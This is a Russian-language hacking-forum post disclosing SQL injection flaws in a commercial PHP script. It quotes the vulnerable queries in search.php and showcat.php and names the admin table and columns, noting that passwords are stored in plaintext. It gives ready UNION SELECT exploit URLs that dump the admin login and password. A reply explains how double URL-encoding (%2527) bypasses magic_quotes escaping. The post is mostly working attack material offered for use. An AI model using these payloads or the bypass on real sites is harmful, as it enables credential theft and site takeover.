Офф.сайт: www.buzzscripts.com Стоймость: 40$ Release date: 22.08.2008 Префикс таблиц бд: bw_ Табличка: bw_admin Клонки: login,password Алгоритм шифрования: нету его(т.е в открытом виде) Админка: http://localhost/admin.php Сценарий search.php Уязвимый код: PHP: $q = "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%';"; ... $qry = "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%' LIMIT $from, $max_results;"; Параметр search передаёться, как есть, без какой либо фильтрации. Что даёт нам выполнить произвольный SQL-зпрос. Необходимо: magic_quotes_gpc = Off Эксплойт: Code: http://localhost/[B][COLOR=Yellow][installdir][/COLOR][/B]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/* Сценарий showcat.php Уязвимый код: Code: $query = mysql_query("SELECT * FROM bw_main WHERE wp_link_cat='".urldecode($_GET['cat'])."' AND wp_status = 1;"); Необходимо: magic_quotes_gpc = Off Эксплойт: Code: http://localhost/[B][COLOR=Yellow][installdir][/COLOR][/B]/showcat.php?cat=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/* http://milw0rm.com/exploits/6527 (c) ~!Dok_tOR!~
Вообще-то во втором случае (showcat.php) magic_quotes_gpc не имеет значения, так как параметр cat перед выполнением запроса попадает в функцию urldecode(), т.е. экранирование кавычки можно обойти, заменив ее на %2527
